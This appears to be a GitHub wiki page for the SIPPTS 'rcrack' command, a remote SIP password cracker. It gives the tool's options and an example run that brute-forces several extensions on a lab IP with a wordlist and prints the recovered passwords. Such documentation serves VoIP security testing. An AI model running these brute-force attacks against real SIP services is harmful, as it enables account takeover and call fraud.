Command rcrack - Pepelux/sippts GitHub Wiki

SIPPTS rcrack is a remote password cracker for SIP services. Rcrack can test passwords for several users in different IPs and port ranges.

Features

Rcrack allows us to:

  • Test remotely a list of users and passwords using REGISTER method.
  • Test users and passwords on a network range.
  • Use a prefix for extensions range (maybe user and extension is not the same).
  • Connection via UDP, TCP or TLS protocol.
  • Resume a previous session.
  • Analyze responses using verbose mode.
  • Allow us to customize the UserAgent.

Usage

$ sippts rcrack -h

Target:
  -i IP|HOST          Target IP address
  -r REMOTE_PORT      Remote port (default: 5060)
  -e EXTEN            Extensions or users to attack. Ex: 100 | 100,102,105 | 100-200 | user100
  -au AUTH_USER       Use a custom SIP Auth User instead the extension
  -p PROTOCOL         Protocol: udp|tcp|tls (default: udp)
  -proxy IP:PORT      Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)

Words:
  -pr PREFIX          Prefix for extensions, used for authentication
  -l LENGHT           Lenght of the extensions (if set, left padding with 0's)
  -w WORDLIST         Wordlist for bruteforce

Headers:
  -d DOMAIN           SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
  -cd CONTACT_DOMAIN  Domain or IP address for Contact header. Ex: 10.0.1.2
  -ua USER_AGENT      User-Agent header (default: pplsip)

Log:
  -v                  Increase verbosity
  -nocolor            Show result without colors

Other options:
  -th THREADS         Number of threads (default: 200)
  -h, --help          Show this help

Example

$ sippts rcrack -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt


Press Ctrl+C to stop


[!] IP/Network: 192.168.2.203
[!] Port: 5080
[!] Exten range: 100,101,103-105
[!] Protocol: UDP
[!] Total threads: 5
[!] Wordlist: wordlist/rockyou.txt

[|] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 103/123456 - 200 OK
Password for user 103 found: 123456
[/] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 100/123123 - 200 OK
Password for user 100 found: 123123
[/] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 105/secret - 200 OK
Password for user 105 found: secret
[/] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 101/666666 - 200 OK
Password for user 101 found: 666666
[|] Scanning 192.168.2.203:5080/UDP => Exten/Pass: 104/passw0rd - 200 OK
Password for user 104 found: passw0rd
 ------------------------------------------------
| IP address    | Port | Proto | User | Password |
 ------------------------------------------------
| 192.168.2.203 | 5080 | UDP   | 100  | 123123   |
| 192.168.2.203 | 5080 | UDP   | 101  | 666666   |
| 192.168.2.203 | 5080 | UDP   | 103  | 123456   |
| 192.168.2.203 | 5080 | UDP   | 104  | passw0rd |
| 192.168.2.203 | 5080 | UDP   | 105  | secret   |
 ------------------------------------------------